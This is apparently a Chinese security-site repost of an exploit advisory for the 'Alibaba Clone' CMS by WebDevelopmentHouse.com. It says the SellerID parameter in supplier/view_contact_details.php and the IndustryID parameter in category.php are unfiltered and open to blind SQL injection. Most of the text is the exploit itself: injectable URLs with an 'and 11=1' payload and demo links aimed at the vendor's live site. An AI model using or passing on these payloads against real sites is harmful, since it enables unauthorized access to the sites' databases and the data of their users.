影响软件:WebDevelopmentHouse.com Alibaba Clone
描述:
category.php“ IndustryID ”和category.php“ SellerID ” supplier/view_contact_details.php 没有严格的过滤.存在SQL注入
XML/HTML代码
- # [+] Alibaba-clone CMS Remote Blind SQL injection
- # [+] Author : 599eme Man
- # [+] Contact : Flouf@live.fr
- # [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker…
- # [+] Dowload : http://blog.duslerim.net/cms/alibabacom-clone-new.html
- #
- #[————————————————————————————]
- #
- #
- # [+] Exploit :
- #
- # http://www.site.com/path/supplier/view_contact_details.php?SellerID=[nr] and 11=1
- #
- # http://www.site.com/path/category.php?IndustryID=[nr] and 11=1
- #
- #[————————————————————————————]
- #
- #
- # [+] Demo :
- #
- # http://www.webdevelopmenthouse.com/alibaba-clone/supplier/view_contact_details.php?SellerID=24 and 11=1
- #
- # http://www.webdevelopmenthouse.com/alibaba-clone/category.php?IndustryID=25 and 11=1
- #
- #########################################################################################################
0 条评论。